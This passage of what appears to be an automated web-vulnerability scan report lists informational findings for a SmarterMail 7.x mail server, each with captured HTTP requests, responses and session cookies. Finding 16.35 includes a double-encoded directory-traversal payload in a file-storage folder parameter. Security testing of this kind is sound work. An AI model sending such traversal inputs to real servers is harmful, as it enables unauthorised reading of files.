Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 16595

__VIEWSTATE=%2fwEPDwULLTEwODA2NTM4NDAPFgoeCF9fX1RpdGxlZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHhdNZXNzYWdlU3BlY2lmaWNWaWV3VHlwZQUEaHRtbB4IVmlld1R5cGUFBGh0bWwWAmYPZBYCAgMPZBYIAgMPFgIeB1Zpc2
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:28 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:28 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html;
...[SNIP]...

16.20. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyAutoResponder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMyAutoResponder.aspx

Request

POST /Main/frmMyAutoResponder.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyAutoResponder.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 10369

ctl00_MPH_RadAutoResponse_dialogOpener_ClientState=&__LASTFOCUS=&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00_MPH_RadAutoResponse_ClientState=&ctl00%24MPH%24chkEnabled_SettingCheck=on&ctl00%24
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:30 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:30 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.21. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMyInfo.aspx

Request

POST /Main/frmMyInfo.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyInfo.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 18089

ctl00%24MPH%24wucContactInfo%24txtCompanyZip_SettingText=Wiener+Consulting&ctl00%24MPH%24wucContactInfo%24txtPersonNameTitle_SettingText=Peter+Wiener&__LASTFOCUS=&ctl00%24MPH%24wucContactInfo%24txtEma
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:31 GMT
Content-Length: 0

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:31 GMT
X-AspNet-Version: 2.0.50727
Location: /frmError.aspx?aspxerrorpath=/Main/frmMyInfo.aspx
Cache-Control: p
...[SNIP]...

16.22. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmNote.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmNote.aspx

Request

POST /Main/frmNote.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmNote.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 5038

__VIEWSTATE=%2fwEPDwUJNTMwODkzMTIzDxYGHghfX19UaXRsZQUITXkgTm90ZXMeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCAw9kFgQCAQ9kFgICAw8PFgIeB1Zpc2libGVoZGQCAw9kFgICAQ8PFgIfA2hkZAIEDx
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:17 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:17 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.23. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignature.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSignature.aspx

Request

POST /Main/frmSignature.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignature.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7033

__VIEWSTATE=%2fwEPDwUKMTA3MDM4NjU2NA8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPPCsAFgUADxYQHg
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:34 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:34 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html;
...[SNIP]...

16.24. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignatures.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSignatures.aspx

Request

POST /Main/frmSignatures.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignatures.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 5346

ctl00%24MPH%24lstUserPrimarySignature_SettingDropDown=domain&__VIEWSTATE=%2fwEPDwULLTIxMDYxNTgyNjEPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCAw9kFgICAQ9kFgICAw9kFgICAQ8PF
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:35 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:35 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.25. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSpamOptions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSpamOptions.aspx

Request

POST /Main/frmSpamOptions.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSpamOptions.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 10119

__VIEWSTATE=%2fwEPDwULLTE5NDY0MzU1MjQPFgoeCF9fX1RpdGxlBQ5TcGFtIEZpbHRlcmluZx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg5WU19Eb21haW5MZXZlbGgeEVZTX0N1cnJlbnRXZWlnaHRzFyIFDlNwYW1oYXVzIC0gUEJMAg
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:36 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:36 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.26. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSyncMLList.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSyncMLList.aspx

Request

POST /Main/frmSyncMLList.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSyncMLList.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7216

__VIEWSTATE=%2fwEPDwUJMjIxNTE5NTQ3DxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeBF9zR0ZnFgJmD2QWAgIBD2QWBgIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:37 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:37 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.27. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmTask.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmTask.aspx

Request

POST /Main/frmTask.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmTask.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 19335

ctl00_MPH_EndDatePicker_SettingText_calendar_AD=%5b%5b1900%2c1%2c1%5d%2c%5b2100%2c1%2c1%5d%2c%5b2010%2c10%2c1%5d%5d&ctl00%24MPH%24txtPassedMessageID=&__LASTFOCUS=&ctl00_MPH_StartDatePicker_SettingText
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:15 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:15 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.28. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmWelcome.aspx

Request

POST /Main/frmWelcome.aspx?unframed=true HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx?unframed=true
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default
Content-Length: 6025

ctl00%24ctl01=ctl00%24BrPH%24UpdatePanel_Buttons%7Cctl00%24BrPH%24btnNext&__EVENTTARGET=ctl00%24BrPH%24btnNext&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjA2NDUzNTkxNg8WBh4IX19fVGl0bGUFGlNtYXJ0ZXJNYWlsIE
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:12 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:12 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain;
...[SNIP]...

16.29. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:OpenMasterCategoriesPopup()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/javascript:OpenMasterCategoriesPopup()

Request

GET /Main/javascript:OpenMasterCategoriesPopup() HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContact.aspx?popup=true
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.30. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/javascript:parent.OpenNewMessage('/

Request

GET /Main/javascript:parent.OpenNewMessage('/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.31. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/Main/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/javascript:parent.OpenNewMessage('/Main/

Request

GET /Main/javascript:parent.OpenNewMessage('/Main/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.32. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/Main/frmCompose.aspx',%20800,%20600)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/javascript:parent.OpenNewMessage('/Main/frmCompose.aspx',%20800,%20600)

Request

GET /Main/javascript:parent.OpenNewMessage('/Main/frmCompose.aspx',%20800,%20600) HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.33. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmEditCustomReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmEditCustomReport.aspx

Request

POST /Reports/frmEditCustomReport.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmEditCustomReport.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 5470

ctl00_MPH_HyperGrid1_HiddenInput=&__VIEWSTATE=%2fwEPDwUKMjAyODA5OTUyMg8WBh4IX19fVGl0bGUFDkN1c3RvbSBSZXBvcnRzHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNw
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:59 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:59 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.34. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Request

POST /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&MyReports HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 3961

ctl00_MPH_InternalReportItem0_TableMenu_S_MI4_CB=on&ctl00_MPH_InternalReportItem0_SortMenu_S_MI2_CB=on&ctl00_MPH_InternalReportItem0_ChartMenu_S_MI7_CB=on&ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:57 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:57 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.35. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmAddFileStorageFolder.aspx

Request

POST /UserControls/Popups/frmAddFileStorageFolder.aspx?parent=Root+Folder%5c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%7bFILE%7d%5c HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx?parent=Root+Folder%5c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%7bFILE%7d%5c
Origin: http://vulnerable.SmarterMail 7.x.host:9998
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1293362628","TopBarSection":"UserStorage","RootLPSize":300}
Content-Length: 40446

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BrPH%24SaveButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BrPH%24SaveButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNjQzNzgwNTYzDxYGHghfX19UaXRsZQUGRm9s
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:38:57 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:38:58 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expire
...[SNIP]...

16.36. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmDeviceSync.aspx

Request

POST /UserControls/Popups/frmDeviceSync.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=
Content-Length: 17133

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BPH%24chkShowAtLogin&__EVENTTARGET=ctl00%24BPH%24chkShowAtLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTkxNjAzNDgyNg8WBB4QX19fUmVzdW
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:27 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:27 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expire
...[SNIP]...

16.37. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmGridSetup.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmGridSetup.aspx

Request

POST /UserControls/Popups/frmGridSetup.aspx?type=calendar HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmGridSetup.aspx?type=calendar
